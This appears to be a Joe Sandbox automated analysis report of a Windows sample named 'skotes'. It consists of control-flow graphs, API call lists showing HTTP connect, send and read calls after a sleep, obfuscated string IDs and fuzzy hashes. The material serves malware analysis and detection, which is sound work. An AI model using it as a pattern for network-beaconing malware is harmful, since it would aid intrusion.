                                                        control_flow_graph 1311 fabe30-fabe7c 1312 fabe82-fabe86 1311->1312 1313 fac281-fac2a6 call fb80c0 1311->1313 1312->1313 1314 fabe8c-fabe90 1312->1314 1319 fac2a8-fac2b4 1313->1319 1320 fac2d4-fac2ec 1313->1320 1314->1313 1316 fabe96-fabf2a Sleep InternetOpenW InternetConnectA call fb7a00 call fa5c10 1314->1316 1344 fabf2e-fabf4a HttpOpenRequestA 1316->1344 1345 fabf2c 1316->1345 1322 fac2ca-fac2d1 call fbd663 1319->1322 1323 fac2b6-fac2c4 1319->1323 1324 fac238-fac250 1320->1324 1325 fac2f2-fac2fe 1320->1325 1322->1320 1323->1322 1331 fac34f-fac354 call fd6c6a 1323->1331 1328 fac323-fac33f call fbcff1 1324->1328 1329 fac256-fac262 1324->1329 1326 fac22e-fac235 call fbd663 1325->1326 1327 fac304-fac312 1325->1327 1326->1324 1327->1331 1334 fac314 1327->1334 1335 fac268-fac276 1329->1335 1336 fac319-fac320 call fbd663 1329->1336 1334->1326 1335->1331 1343 fac27c 1335->1343 1336->1328 1343->1336 1349 fabf7b-fabfea call fb7a00 call fa5c10 call fb7a00 call fa5c10 1344->1349 1350 fabf4c-fabf5b 1344->1350 1345->1344 1363 fabfee-fac004 HttpSendRequestA 1349->1363 1364 fabfec 1349->1364 1351 fabf5d-fabf6b 1350->1351 1352 fabf71-fabf78 call fbd663 1350->1352 1351->1352 1352->1349 1365 fac006-fac015 1363->1365 1366 fac035-fac05d 1363->1366 1364->1363 1367 fac02b-fac032 call fbd663 1365->1367 1368 fac017-fac025 1365->1368 1369 fac08e-fac0af InternetReadFile 1366->1369 1370 fac05f-fac06e 1366->1370 1367->1366 1368->1367 1371 fac0b5 1369->1371 1373 fac070-fac07e 1370->1373 1374 fac084-fac08b call fbd663 1370->1374 1376 fac0c0-fac170 call fd4250 1371->1376 1373->1374 1374->1369
                                                        APIs
                                                        • Sleep.KERNEL32(000005DC), ref: 00FABEB8
                                                        • InternetOpenW.WININET(00FF8DC8,00000000,00000000,00000000,00000000), ref: 00FABEC8
                                                        • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 00FABEEC
                                                        • HttpOpenRequestA.WININET(?,00000000), ref: 00FABF36
                                                        • HttpSendRequestA.WININET(?,00000000), ref: 00FABFF6
                                                        • InternetReadFile.WININET(?,?,000003FF,?), ref: 00FAC0A8
                                                        • InternetCloseHandle.WININET(?), ref: 00FAC187
                                                        • InternetCloseHandle.WININET(?), ref: 00FAC18F
                                                        • InternetCloseHandle.WININET(?), ref: 00FAC197
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2895241974.0000000000FA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FA0000, based on PE: true
                                                        • Associated: 00000006.00000002.2895209071.0000000000FA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895241974.0000000001002000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895341143.0000000001009000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.000000000100B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.000000000126B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.000000000129C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.00000000012A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.00000000012B2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895781747.00000000012B3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895962301.000000000144C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895991964.000000000144E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_fa0000_skotes.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectFileReadSendSleep
                                                        • String ID: 8HJUeIfzLo==$8HJUeMD Lq5=$RE1NXF==$RmNn$invalid stoi argument$stoi argument out of range
                                                        • API String ID: 2167506142-2254971868
                                                        • Opcode ID: f2556f131f54d3fb260d406fa513c4d67272974907c9e2feb0ba75c66b6650dd
                                                        • Instruction ID: b0daa2f81f7274e40f0a287fd3a0b59134bfb0af064313b4e193929b9809402b
                                                        • Opcode Fuzzy Hash: f2556f131f54d3fb260d406fa513c4d67272974907c9e2feb0ba75c66b6650dd
                                                        • Instruction Fuzzy Hash: 32B1D4B1A002189BDF24CF28CC84BDD7BB9EF46304F508199F50997292D7759AC0DF95

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1466 fae530-fae843 call fb7a00 call fa5c10 call fb7a00 call fa5c10 call fb9280 call fb8320 call fb8220 call fb8320 call fb7a00 * 3 call fabe30 call fb7a00 * 2 call fa5c10 call fa8580 1504 faea1a-faea62 1466->1504 1505 fae8ce-fae9ec 1466->1505 1504->1505 1509 faea8f-faea96 call fbd663 1504->1509 1514 faea99-faeab2 call fbcff1 1505->1514 1515 fae9f2-fae9fe 1505->1515 1509->1514 1515->1509 1516 faea04-faea12 1515->1516 1516->1504 1518 faeab8-faee79 call fd6c6a * 2 call fb7a00 call fa5c10 call fb83c0 call fb8220 call fb7a00 call fa5c10 call fb83c0 call fb8220 1516->1518 1554 faf5bb-faf66c call fb80c0 1518->1554 1555 faf273-faf28b 1518->1555 1554->1555 1559 faf699-faf6a0 call fbd663 1554->1559 1556 faf6a3-faf6b6 1555->1556 1557 faf291-faf29d 1555->1557 1557->1559 1560 faf2a3-faf2b1 1557->1560 1559->1556 1560->1554 1562 faf6cb-faf962 call fd6c6a call fb7a00 call fa5c10 call fb7a00 * 4 call fae530 call fb80c0 call fb7a00 call fb80c0 * 2 1560->1562 1597 faf98c-faf9a5 call fbcff1 1562->1597 1598 faf964-faf970 1562->1598 1599 faf982-faf989 call fbd663 1598->1599 1600 faf972-faf980 1598->1600 1599->1597 1600->1599 1602 faf9ab-fafb15 call fd6c6a call fb7a00 call fa5c10 call fb7a00 * 4 call fae530 1600->1602 1626 fafb3f-fafb4e 1602->1626 1627 fafb17-fafb23 1602->1627 1628 fafb35-fafb3c call fbd663 1627->1628 1629 fafb25-fafb33 1627->1629 1628->1626 1629->1628 1630 fafb4f-fafc6f call fd6c6a call fb7a00 call fa9580 call fa9230 call fb8320 1629->1630 1645 fafc70-fafc75 1630->1645 1645->1645 1646 fafc77-fb0860 call fb80c0 call fb7a00 * 2 call fac360 call fd6729 call fb7a00 call fa5c10 call fb7a00 * 4 call fae530 1645->1646 1680 fb088a-fb08a5 call fbcff1 1646->1680 1681 fb0862-fb086e 1646->1681 1682 fb0880-fb0887 call fbd663 1681->1682 1683 fb0870-fb087e 1681->1683 1682->1680 1683->1682 1685 fb08ce-fb12e4 call fd6c6a call fb7a00 call fa5c10 call fb7a00 * 4 call fae530 1683->1685 1707 fb12e9-fb1537 1685->1707
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2895241974.0000000000FA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FA0000, based on PE: true
                                                        • Associated: 00000006.00000002.2895209071.0000000000FA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895241974.0000000001002000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895341143.0000000001009000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.000000000100B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.000000000126B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.000000000129C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.00000000012A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.00000000012B2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895781747.00000000012B3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895962301.000000000144C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895991964.000000000144E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_fa0000_skotes.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: #$111$246122658369$9c9aa5$GnNoc2Hc$MGE+$MQ==$UA==$WDw=$WTs=$WTw=
                                                        • API String ID: 0-2571795437
                                                        • Opcode ID: 740138d51f7e41db888036e79f00fd1c26bab199d12517e697ba492bb2ed1a0f
                                                        • Instruction ID: c0dfa2b4c177ac3cb61025094b54d62087fdf7580a4d17b23d6e2cf87311199b
                                                        • Opcode Fuzzy Hash: 740138d51f7e41db888036e79f00fd1c26bab199d12517e697ba492bb2ed1a0f
                                                        • Instruction Fuzzy Hash: 0282E4709043889BEF15EF68C9597CE7FB6AB46304F504188E8056B3C2D7799A88DFD2
                                                        APIs
                                                        • ___std_exception_copy.LIBVCRUNTIME ref: 00FA24BE
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2895241974.0000000000FA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FA0000, based on PE: true
                                                        • Associated: 00000006.00000002.2895209071.0000000000FA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895241974.0000000001002000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895341143.0000000001009000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.000000000100B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.000000000126B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.000000000129C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.00000000012A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.00000000012B2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895781747.00000000012B3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895962301.000000000144C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895991964.000000000144E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_fa0000_skotes.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ___std_exception_copy
                                                        • String ID:
                                                        • API String ID: 2659868963-0
                                                        • Opcode ID: cbeeec143e6273737187a2630e7f4e0094f8f8e5ecb3debb9280df8d8dda9958
                                                        • Instruction ID: c717a1ae2583edca0d6f289ee9f2aa2c51c7ea54e47bf0b47ab8e4322baf3cad
                                                        • Opcode Fuzzy Hash: cbeeec143e6273737187a2630e7f4e0094f8f8e5ecb3debb9280df8d8dda9958
                                                        • Instruction Fuzzy Hash: 2951AE72D0430ACBEB26CF59D8857ADB7B5FB48324F24842AD449EB245E339E940DF51

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 0 fb3640-fb3679 1 fb367f-fb36cf call fb80c0 0->1 2 fb4250-fb4256 0->2 11 fb4327 call fb8200 1->11 12 fb36d5-fb371b call fb80c0 1->12 3 fb4258-fb4264 2->3 4 fb4284-fb429c 2->4 7 fb427a-fb4281 call fbd663 3->7 8 fb4266-fb4274 3->8 9 fb42ca-fb42e2 4->9 10 fb429e-fb42aa 4->10 7->4 8->7 15 fb4363 call fd6c6a 8->15 13 fb430c-fb4326 call fbcff1 9->13 14 fb42e4-fb42f0 9->14 17 fb42ac-fb42ba 10->17 18 fb42c0-fb42c7 call fbd663 10->18 31 fb432c call fb8200 11->31 12->11 32 fb3721-fb375f call fb80c0 12->32 22 fb4302-fb4309 call fbd663 14->22 23 fb42f2-fb4300 14->23 17->15 17->18 18->9 22->13 23->15 23->22 35 fb4331 call fd6c6a 31->35 32->11 40 fb3765-fb37b0 call fb80c0 call fb7a00 call fa5c10 32->40 39 fb4336 call fd6c6a 35->39 43 fb433b call fb8200 39->43 54 fb37b2 40->54 55 fb37b4-fb37e9 call fb8ba0 40->55 47 fb4340 call fd6c6a 43->47 51 fb4345 call fd6c6a 47->51 57 fb434a-fb434f call fbc199 51->57 54->55 55->31 60 fb37ef-fb381e call fb80c0 55->60 61 fb4354 call fd6c6a 57->61 66 fb384f-fb3874 call fa98f0 60->66 67 fb3820-fb382f 60->67 65 fb4359-fb435e call fbc1d9 61->65 65->15 75 fb387a-fb38e2 call fb7a00 call fa5c10 call fb80c0 66->75 76 fb3d58-fb3d5e 66->76 69 fb3831-fb383f 67->69 70 fb3845-fb384c call fbd663 67->70 69->35 69->70 70->66 110 fb38e6-fb391d call fb9470 75->110 111 fb38e4 75->111 77 fb3d8c-fb3d92 76->77 78 fb3d60-fb3d6c 76->78 80 fb3dc0-fb3dc6 77->80 81 fb3d94-fb3da0 77->81 82 fb3d6e-fb3d7c 78->82 83 fb3d82-fb3d89 call fbd663 78->83 89 fb3dc8-fb3dd4 80->89 90 fb3df4-fb3e0c 80->90 87 fb3da2-fb3db0 81->87 88 fb3db6-fb3dbd call fbd663 81->88 82->61 82->83 83->77 87->61 87->88 88->80 94 fb3dea-fb3df1 call fbd663 89->94 95 fb3dd6-fb3de4 89->95 96 fb3e0e-fb3e1d 90->96 97 fb3e3d-fb3e43 90->97 94->90 95->61 95->94 98 fb3e1f-fb3e2d 96->98 99 fb3e33-fb3e3a call fbd663 96->99 97->2 101 fb3e49-fb3e55 97->101 98->61 98->99 99->97 106 fb3e5b-fb3e69 101->106 107 fb4246-fb424d call fbd663 101->107 106->61 113 fb3e6f 106->113 107->2 117 fb394a-fb3957 110->117 118 fb391f-fb392a 110->118 111->110 113->107 121 fb3959-fb3968 117->121 122 fb3988-fb398f 117->122 119 fb392c-fb393a 118->119 120 fb3940-fb3947 call fbd663 118->120 119->39 119->120 120->117 126 fb396a-fb3978 121->126 127 fb397e-fb3985 call fbd663 121->127 123 fb3b53-fb3b83 call fd75f6 call fd8ab6 122->123 124 fb3995-fb39b7 122->124 123->57 139 fb3b89-fb3b8c 123->139 124->43 129 fb39bd-fb39ef call fb80c0 call faad70 124->129 126->39 126->127 127->122 142 fb39f1-fb39f7 129->142 143 fb3a47-fb3a50 129->143 139->65 141 fb3b92-fb3b95 139->141 141->76 144 fb3b9b 141->144 147 fb39f9-fb3a05 142->147 148 fb3a25-fb3a44 142->148 145 fb3a52-fb3a61 143->145 146 fb3a81-fb3ac1 call fb7a00 * 2 call fa49a0 143->146 149 fb3c8d-fb3d4d call fb80c0 call fb7a00 call fa5c10 call fb7a00 * 5 call fb1ec0 144->149 150 fb3ba2-fb3c67 call fb80c0 call fb7a00 call fa5c10 call fb7a00 * 5 144->150 151 fb3f42-fb3fa4 call fb7a00 * 4 call fb2f10 144->151 152 fb3e74-fb3f3d call fb80c0 call fb7a00 call fa5c10 call fb7a00 * 5 144->152 153 fb3a63-fb3a71 145->153 154 fb3a77-fb3a7e call fbd663 145->154 189 fb3b19-fb3b22 146->189 190 fb3ac3-fb3ac9 146->190 156 fb3a1b-fb3a22 call fbd663 147->156 157 fb3a07-fb3a15 147->157 148->143 241 fb3d52 149->241 238 fb3c6b-fb3c7d call fb7a00 call fb08e0 150->238 151->76 152->238 153->47 153->154 154->146 156->148 157->47 157->156 189->123 195 fb3b24-fb3b33 189->195 198 fb3acb-fb3ad7 190->198 199 fb3af7-fb3b16 190->199 205 fb3b49-fb3b50 call fbd663 195->205 206 fb3b35-fb3b43 195->206 201 fb3ad9-fb3ae7 198->201 202 fb3aed-fb3af4 call fbd663 198->202 199->189 201->51 201->202 202->199 205->123 206->51 206->205 244 fb3c82-fb3c88 238->244 241->76 244->76
                                                        APIs
                                                        • std::_Xinvalid_argument.LIBCPMT ref: 00FB434F
                                                          • Part of subcall function 00FB7A00: __Cnd_unregister_at_thread_exit.LIBCPMT ref: 00FB7AEC
                                                          • Part of subcall function 00FB7A00: __Cnd_destroy_in_situ.LIBCPMT ref: 00FB7AF8
                                                          • Part of subcall function 00FB7A00: __Mtx_destroy_in_situ.LIBCPMT ref: 00FB7B01
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2895241974.0000000000FA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FA0000, based on PE: true
                                                        • Associated: 00000006.00000002.2895209071.0000000000FA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895241974.0000000001002000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895341143.0000000001009000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.000000000100B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.000000000126B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.000000000129C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.00000000012A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.00000000012B2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895781747.00000000012B3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895962301.000000000144C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895991964.000000000144E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_fa0000_skotes.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Cnd_destroy_in_situCnd_unregister_at_thread_exitMtx_destroy_in_situXinvalid_argumentstd::_
                                                        • String ID: 2I0$ 3I3eB==$ GE0$ jS=$"$246122658369$5120$8WI0$9250$93E0$9HQ0$9c9aa5$Fw==$Hykl$KCWUOl==$MGE+$MGI+$V2Te$VXA0$VXQ0$Vmc0$WGS0$WGpm$WX f$aWW0$anE0$invalid stoi argument$stoi argument out of range
                                                        • API String ID: 4234742559-385961153
                                                        • Opcode ID: 7def98101537ab86b906d499bcbf797d4c6114ae34af956c112ba01522c3b24e
                                                        • Instruction ID: 90e027cde4137f043d5d82cb8da543cf9d38a40d22928c11d8a1f02cb69da995
                                                        • Opcode Fuzzy Hash: 7def98101537ab86b906d499bcbf797d4c6114ae34af956c112ba01522c3b24e
                                                        • Instruction Fuzzy Hash: 5A522571A002489BDF18EF79CD867DDBBB5AF45300F54458CE405A7282DB39AB84EF92

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1020 fb2f10-fb351c call fb7a00 call fa5c10 call fb7a00 * 4 call fae530 1037 fb354a-fb3562 1020->1037 1038 fb351e-fb352a 1020->1038 1041 fb3590-fb35a8 1037->1041 1042 fb3564-fb3570 1037->1042 1039 fb352c-fb353a 1038->1039 1040 fb3540-fb3547 call fbd663 1038->1040 1039->1040 1045 fb3639-fb3679 call fd6c6a 1039->1045 1040->1037 1043 fb35aa-fb35b6 1041->1043 1044 fb35d2-fb35ea 1041->1044 1047 fb3572-fb3580 1042->1047 1048 fb3586-fb358d call fbd663 1042->1048 1049 fb35c8-fb35cf call fbd663 1043->1049 1050 fb35b8-fb35c6 1043->1050 1051 fb35ec-fb35f8 1044->1051 1052 fb3614-fb362e call fbcff1 1044->1052 1067 fb367f-fb36cf call fb80c0 1045->1067 1068 fb4250-fb4256 1045->1068 1047->1045 1047->1048 1048->1041 1049->1044 1050->1045 1050->1049 1058 fb360a-fb3611 call fbd663 1051->1058 1059 fb35fa-fb3608 1051->1059 1058->1052 1059->1045 1059->1058 1077 fb4327 call fb8200 1067->1077 1078 fb36d5-fb371b call fb80c0 1067->1078 1069 fb4258-fb4264 1068->1069 1070 fb4284-fb429c 1068->1070 1073 fb427a-fb4281 call fbd663 1069->1073 1074 fb4266-fb4274 1069->1074 1075 fb42ca-fb42e2 1070->1075 1076 fb429e-fb42aa 1070->1076 1073->1070 1074->1073 1081 fb4363 call fd6c6a 1074->1081 1079 fb430c-fb4326 call fbcff1 1075->1079 1080 fb42e4-fb42f0 1075->1080 1083 fb42ac-fb42ba 1076->1083 1084 fb42c0-fb42c7 call fbd663 1076->1084 1097 fb432c call fb8200 1077->1097 1078->1077 1098 fb3721-fb375f call fb80c0 1078->1098 1088 fb4302-fb4309 call fbd663 1080->1088 1089 fb42f2-fb4300 1080->1089 1083->1081 1083->1084 1084->1075 1088->1079 1089->1081 1089->1088 1101 fb4331 call fd6c6a 1097->1101 1098->1077 1106 fb3765-fb37b0 call fb80c0 call fb7a00 call fa5c10 1098->1106 1105 fb4336 call fd6c6a 1101->1105 1109 fb433b call fb8200 1105->1109 1120 fb37b2 1106->1120 1121 fb37b4-fb37e9 call fb8ba0 1106->1121 1113 fb4340 call fd6c6a 1109->1113 1117 fb4345 call fd6c6a 1113->1117 1123 fb434a-fb434f call fbc199 1117->1123 1120->1121 1121->1097 1126 fb37ef-fb381e call fb80c0 1121->1126 1127 fb4354 call fd6c6a 1123->1127 1132 fb384f-fb3874 call fa98f0 1126->1132 1133 fb3820-fb382f 1126->1133 1131 fb4359-fb435e call fbc1d9 1127->1131 1131->1081 1141 fb387a-fb38e2 call fb7a00 call fa5c10 call fb80c0 1132->1141 1142 fb3d58-fb3d5e 1132->1142 1135 fb3831-fb383f 1133->1135 1136 fb3845-fb384c call fbd663 1133->1136 1135->1101 1135->1136 1136->1132 1176 fb38e6-fb391d call fb9470 1141->1176 1177 fb38e4 1141->1177 1143 fb3d8c-fb3d92 1142->1143 1144 fb3d60-fb3d6c 1142->1144 1146 fb3dc0-fb3dc6 1143->1146 1147 fb3d94-fb3da0 1143->1147 1148 fb3d6e-fb3d7c 1144->1148 1149 fb3d82-fb3d89 call fbd663 1144->1149 1155 fb3dc8-fb3dd4 1146->1155 1156 fb3df4-fb3e0c 1146->1156 1153 fb3da2-fb3db0 1147->1153 1154 fb3db6-fb3dbd call fbd663 1147->1154 1148->1127 1148->1149 1149->1143 1153->1127 1153->1154 1154->1146 1160 fb3dea-fb3df1 call fbd663 1155->1160 1161 fb3dd6-fb3de4 1155->1161 1162 fb3e0e-fb3e1d 1156->1162 1163 fb3e3d-fb3e43 1156->1163 1160->1156 1161->1127 1161->1160 1164 fb3e1f-fb3e2d 1162->1164 1165 fb3e33-fb3e3a call fbd663 1162->1165 1163->1068 1167 fb3e49-fb3e55 1163->1167 1164->1127 1164->1165 1165->1163 1172 fb3e5b-fb3e69 1167->1172 1173 fb4246-fb424d call fbd663 1167->1173 1172->1127 1179 fb3e6f 1172->1179 1173->1068 1183 fb394a-fb3957 1176->1183 1184 fb391f-fb392a 1176->1184 1177->1176 1179->1173 1187 fb3959-fb3968 1183->1187 1188 fb3988-fb398f 1183->1188 1185 fb392c-fb393a 1184->1185 1186 fb3940-fb3947 call fbd663 1184->1186 1185->1105 1185->1186 1186->1183 1192 fb396a-fb3978 1187->1192 1193 fb397e-fb3985 call fbd663 1187->1193 1189 fb3b53-fb3b83 call fd75f6 call fd8ab6 1188->1189 1190 fb3995-fb39b7 1188->1190 1189->1123 1205 fb3b89-fb3b8c 1189->1205 1190->1109 1195 fb39bd-fb39ef call fb80c0 call faad70 1190->1195 1192->1105 1192->1193 1193->1188 1208 fb39f1-fb39f7 1195->1208 1209 fb3a47-fb3a50 1195->1209 1205->1131 1207 fb3b92-fb3b95 1205->1207 1207->1142 1210 fb3b9b 1207->1210 1213 fb39f9-fb3a05 1208->1213 1214 fb3a25-fb3a44 1208->1214 1211 fb3a52-fb3a61 1209->1211 1212 fb3a81-fb3ac1 call fb7a00 * 2 call fa49a0 1209->1212 1215 fb3c8d-fb3d52 call fb80c0 call fb7a00 call fa5c10 call fb7a00 * 5 call fb1ec0 1210->1215 1216 fb3ba2-fb3c67 call fb80c0 call fb7a00 call fa5c10 call fb7a00 * 5 1210->1216 1217 fb3f42-fb3fa4 call fb7a00 * 4 call fb2f10 1210->1217 1218 fb3e74-fb3f3d call fb80c0 call fb7a00 call fa5c10 call fb7a00 * 5 1210->1218 1219 fb3a63-fb3a71 1211->1219 1220 fb3a77-fb3a7e call fbd663 1211->1220 1255 fb3b19-fb3b22 1212->1255 1256 fb3ac3-fb3ac9 1212->1256 1222 fb3a1b-fb3a22 call fbd663 1213->1222 1223 fb3a07-fb3a15 1213->1223 1214->1209 1215->1142 1304 fb3c6b-fb3c74 call fb7a00 1216->1304 1217->1142 1218->1304 1219->1113 1219->1220 1220->1212 1222->1214 1223->1113 1223->1222 1255->1189 1261 fb3b24-fb3b33 1255->1261 1264 fb3acb-fb3ad7 1256->1264 1265 fb3af7-fb3b16 1256->1265 1271 fb3b49-fb3b50 call fbd663 1261->1271 1272 fb3b35-fb3b43 1261->1272 1267 fb3ad9-fb3ae7 1264->1267 1268 fb3aed-fb3af4 call fbd663 1264->1268 1265->1255 1267->1117 1267->1268 1268->1265 1271->1189 1272->1117 1272->1271 1308 fb3c79-fb3c7d call fb08e0 1304->1308 1310 fb3c82-fb3c88 1308->1310 1310->1142
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2895241974.0000000000FA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FA0000, based on PE: true
                                                        • Associated: 00000006.00000002.2895209071.0000000000FA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895241974.0000000001002000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895341143.0000000001009000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.000000000100B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.000000000126B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.000000000129C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.00000000012A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.00000000012B2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895781747.00000000012B3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895962301.000000000144C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895991964.000000000144E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_fa0000_skotes.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Cnd_destroy_in_situCnd_unregister_at_thread_exitMtx_destroy_in_situ
                                                        • String ID: "$246122658369$5120$Fw==$Hykl$V2Te$WGpm$WTw=$WX f$invalid stoi argument$stoi argument out of range
                                                        • API String ID: 4078500453-1402436090
                                                        • Opcode ID: 077fe85cbe6965bdd293fc1a6bfb1ad837e402792b47188d6ad0ed5c1df7eac0
                                                        • Instruction ID: 5a2693dc0e316e7143524f6b1c9788b309e1b3326707b478367ef6b975c5015f
                                                        • Opcode Fuzzy Hash: 077fe85cbe6965bdd293fc1a6bfb1ad837e402792b47188d6ad0ed5c1df7eac0
                                                        • Instruction Fuzzy Hash: 43720571A002489BDF18EF79CD8A7DDBBB5AF45300F54458CE405A7282D739AB84EF92

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
